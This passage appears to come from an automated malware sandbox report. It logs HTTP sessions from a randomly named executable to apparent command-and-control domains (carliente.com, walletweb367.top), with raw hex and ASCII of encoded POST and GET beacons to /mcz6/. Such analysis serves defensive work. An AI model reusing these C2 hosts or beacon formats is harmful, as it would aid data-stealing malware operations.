{ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 5, 2024 15:06:19.913570881 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	217.160.0.111	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:21.843724966 CEST	759	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 76 5a 52 37 70 68 5a 33 53 61 46 32 62 52 7a 71 2f 46 58 39 49 4d 47 77 56 65 43 71 77 77 38 32 51 72 6c 55 33 65 4e 39 37 49 56 57 30 34 50 2f 39 31 53 53 6d 46 62 34 32 61 69 6a 37 38 56 5a 66 45 4e 61 47 72 4e 6c 74 32 6c 68 64 37 79 77 49 43 65 65 63 66 63 75 76 78 6c 79 47 61 71 67 35 72 71 6f 49 45 6f 6f 51 44 75 67 52 48 6c 62 31 74 4f 43 53 39 72 71 53 6d 33 51 4f 45 75 73 7a 48 66 39 6c 6d 48 69 56 4c 6c 2f 77 57 6e 4d 53 7a 45 79 49 49 30 6b 62 2b 70 42 77 73 31 75 37 31 39 6c 34 56 75 62 39 58 35 77 41 3d Data Ascii: abN=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP1vZR7phZ3SaF2bRzq/FX9IMGwVeCqww82QrlU3eN97IVW04P/91SSmFb42aij78VZfENaGrNlt2lhd7ywICeecfcuvxlyGaqg5rqoIEooQDugRHlb1tOCS9rqSm3QOEuszHf9lmHiVLl/wWnMSzEyII0kb+pBws1u719l4Vub9X5wA=
Jun 5, 2024 15:06:22.663008928 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 05 Jun 2024 13:06:22 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 5, 2024 15:06:22.663048029 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49755	217.160.0.111	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:24.375466108 CEST	10841	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 33 5a 52 4a 78 68 62 57 53 61 45 32 62 52 74 36 2f 49 58 39 49 72 47 77 4d 5a 43 71 38 47 38 30 6f 72 6e 31 58 65 61 34 62 49 66 57 30 34 44 66 39 6f 66 79 6d 71 62 37 65 65 69 6e 58 38 56 5a 66 45 4e 59 65 72 4b 32 31 32 6e 68 64 30 37 51 49 4f 50 4f 63 37 63 75 32 4a 6c 79 7a 74 72 54 78 72 71 49 59 45 71 61 49 44 6e 67 52 2f 78 37 31 50 4f 43 57 75 72 75 7a 66 33 52 36 75 75 71 50 48 64 4c 34 72 65 54 4a 50 78 64 45 52 37 64 36 62 64 77 41 50 38 46 50 44 73 67 55 6e 70 65 79 59 77 30 5a 4e 72 4b 34 52 69 56 38 63 78 65 2b 58 50 37 6b 2b 68 55 70 74 2f 42 30 65 2f 62 69 55 64 2b 35 50 64 43 58 49 66 56 37 4f 77 31 76 65 2f 57 63 76 47 68 6f 57 43 38 5a 73 5a 39 44 52 30 62 42 44 79 78 69 2f 54 70 42 68 6c 77 58 66 53 55 35 66 75 32 72 55 57 4c 52 43 39 6a 34 51 39 79 30 4e 68 62 72 4d 33 74 49 53 78 59 42 69 65 74 6d 35 57 2f 49 7a 78 55 57 58 6c 2b 74 47 4b 41 [TRUNCATED] Data Ascii: abN=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP13ZRJxhbWSaE2bRt6/IX9IrGwMZCq8G80orn1Xea4bIfW04Df9ofymqb7eeinX8VZfENYerK212nhd07QIOPOc7cu2JlyztrTxrqIYEqaIDngR/x71POCWuruzf3R6uuqPHdL4reTJPxdER7d6bdwAP8FPDsgUnpeyYw0ZNrK4RiV8cxe+XP7k+hUpt/B0e/biUd+5PdCXIfV7Ow1ve/WcvGhoWC8ZsZ9DR0bBDyxi/TpBhlwXfSU5fu2rUWLRC9j4Q9y0NhbrM3tISxYBietm5W/IzxUWXl+tGKAy/RcUv7aTPpnvW3vvh5PJu1xEDab34FXf8IP18UaoRYqPDCuzmV6242wZQhnI7sVt3sC+MxcBIesSquydcQ9setJVNRYkKdC7vDi6iEgTK0sMycGRODzml496g24GVng8EL7C4eUGbfQpprORlQVF6e6xPdKFlcjY6nLoMkF56aFvkkMsOCyCpdL1d9zTNR71Ss3WC6A1JCUGgzZsIfjEC+XbhGWIPPy5sm/b7GyDJlnKclearClb7vU0qSpc6dJYlLUHdIm/bv19RMQEl5KPKaHi1TdON3yld67P+t7geRpr2fQyQw3In9pJR5ah5NVcxRo1ITUBtXHGqQzFiq1dlBf0U8SCnv6B8EBQFYi797o7EXDwe8OQ72e8Fo7X2ALQFiQkgPBF+9cRomEr7c3j4u12jxVyH8P1ndvu8hD0csIn8DliWDW8jStDgT63bSu9vQQA0AhAzK+UYeYsWmN3uACQSeUIqWgSQxouFQFwZb6IKNg76V72HUt0o9QGbXBM9jEvlMfIuE7IR2UxUAoDDplkTRidj4NVFMqOciTby2UeJsCmQ49Ew4/lJ20drBmyK1Uy8qT9O1p5KWMlj1NyReDn67SOyHN7eEUiPE3tJfitjPvq09l7ZaGz9xFRJCcb9/uO9E2x5w+Twjoy7fSKyFjwt6yPrRsL8 [TRUNCATED]
Jun 5, 2024 15:06:25.212505102 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 05 Jun 2024 13:06:25 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 5, 2024 15:06:25.212531090 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49756	217.160.0.111	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:26.906204939 CEST	479	OUT	GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk= HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:06:27.737654924 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4545 Connection: close Date: Wed, 05 Jun 2024 13:06:27 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Jun 5, 2024 15:06:27.737701893 CEST	212	IN	Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31 Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,
Jun 5, 2024 15:06:27.737740040 CEST	1236	IN	Data Raw: 31 2e 33 36 2c 30 2c 30 2c 31 2c 36 32 2c 31 31 2e 38 48 37 37 2e 32 63 2e 38 2c 30 2c 31 2e 35 2e 32 2c 31 2e 35 2c 31 2e 35 76 2e 39 63 2d 2e 31 2e 36 2d 2e 32 2c 31 2e 35 2d 31 2e 36 2c 31 2e 35 4d 39 37 2e 32 2c 33 35 2e 32 48 39 35 2e 31 61 Data Ascii: 1.36,0,0,1,62,11.8H77.2c.8,0,1.5.2,1.5,1.5v.9c-.1.6-.2,1.5-1.6,1.5M97.2,35.2H95.1a2.46,2.46,0,0,1-2.2-.9l-6-7.6H85.8v7a1.4,1.4,0,0,1-1.5,1.6H82.8c-1.1,0-1.7-.3-1.7-1.6V13.2c0-1.4.9-1.5,1.7-1.5h6.5c3.7,0,4.7.2,6.1,1.6s1.8,3.6,1.8,6.7c0,2.9-.8,4
Jun 5, 2024 15:06:27.737773895 CEST	1236	IN	Data Raw: 4d 32 34 2e 39 2c 31 34 61 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2d 32 2e 33 2d 32 2e 33 48 33 2e 36 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 31 2e 33 2c 31 34 56 33 32 2e 37 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 33 Data Ascii: M24.9,14a2.26,2.26,0,0,0-2.3-2.3H3.6A2.26,2.26,0,0,0,1.3,14V32.7A2.26,2.26,0,0,0,3.6,35H22.4a2.26,2.26,0,0,0,2.3-2.3C24.8,32.7,24.9,14,24.9,14Z" transform="translate(-1.3 -2.3)"/></svg></a></div></div> <div style="color:#3
Jun 5, 2024 15:06:27.737811089 CEST	763	IN	Data Raw: 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 66 72 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 Data Ascii: v style="padding-bottom: 30px" lang="fr"><span style="font-size: 14px; color: #777; font-weight: bold;">Français</span><br>Cette page web vient juste d'être activée. Elle n'a pour l'istant aucun contenu.</div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49757	91.195.240.123	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:33.229914904 CEST	748	OUT	POST /mcz6/ HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.walletweb367.top Referer: http://www.walletweb367.top/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 37 71 35 66 72 37 67 37 4c 47 6a 48 41 78 62 6e 46 73 63 5a 33 54 44 75 46 32 30 71 45 41 59 67 55 54 57 49 53 6f 5a 75 58 43 30 77 57 4d 59 6c 70 63 50 50 45 7a 4a 77 73 35 37 77 59 54 45 74 71 64 67 67 35 71 30 67 39 4e 72 52 58 42 39 6b 42 77 51 79 4c 67 43 55 34 36 4c 44 4b 75 4a 2f 43 46 36 33 51 32 2f 65 78 4a 39 50 33 37 34 58 57 72 61 49 36 49 6a 6f 34 46 61 57 32 5a 49 38 50 4c 57 71 39 6b 71 7a 65 43 6b 4a 5a 6b 79 73 37 45 65 32 77 6e 53 52 56 45 4a 67 68 32 45 51 47 42 38 2b 67 47 69 65 42 7a 6a 37 75 71 7a 79 5a 77 43 43 36 77 3d 3d Data Ascii: abN=zJoyZiUMOHpB7q5fr7g7LGjHAxbnFscZ3TDuF20qEAYgUTWISoZuXC0wWMYlpcPPEzJws57wYTEtqdgg5q0g9NrRXB9kBwQyLgCU46LDKuJ/CF63Q2/exJ9P374XWraI6Ijo4FaW2ZI8PLWq9kqzeCkJZkys7Ee2wnSRVEJgh2EQGB8+gGieBzj7uqzyZwCC6w==
Jun 5, 2024 15:06:34.090672016 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 05 Jun 2024 13:06:33 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49758	91.195.240.123	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:06:35.771526098 CEST	768	OUT	POST /mcz6/ HTTP/1.1 Host: www.walletweb367.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.walletweb367.top Referer: http://www.walletweb367.top/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 79 4d 67 56 79 6d 49 41 70 5a 75 55 43 30 77 5a 73 59 67 6b 38 50 79 45 7a 45 44 73 37 2f 77 59 58 73 74 71 5a 6b 67 35 62 30 68 39 64 72 58 43 78 39 6d 4d 51 51 79 4c 67 43 55 34 36 65 6d 4b 75 52 2f 43 52 47 33 42 6b 48 5a 74 35 39 4f 2b 62 34 58 41 62 61 4d 36 49 6a 47 34 45 47 38 32 64 34 38 50 4b 6d 71 38 32 43 77 4a 79 6b 50 48 6b 7a 53 79 46 50 4a 71 55 57 5a 4c 6e 74 56 72 6e 41 6b 4f 6e 74 6b 78 33 44 4a 54 7a 48 49 7a 74 36 47 55 7a 2f 4c 68 34 34 6d 5a 65 48 6e 2b 34 6c 38 4c 64 5a 6a 52 4c 73 4f 4a 70 30 3d Data Ascii: abN=zJoyZiUMOHpBpaJfoYY7amjYKRbnMMdS3THuF3A6DyMgVymIApZuUC0wZsYgk8PyEzEDs7/wYXstqZkg5b0h9drXCx9mMQQyLgCU46emKuR/CRG3BkHZt59O+b4XAbaM6IjG4EG82d48PKmq82CwJykPHkzSyFPJqUWZLntVrnAkOntkx3DJTzHIzt6GUz/Lh44mZeHn+4l8LdZjRLsOJp0=
Jun 5, 2024 15:06:36.612572908 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 05 Jun 2024 13:06:36 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49759	91.195.240.123	80	5228	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe

Timestamp	Bytes transferred	Direction	Data
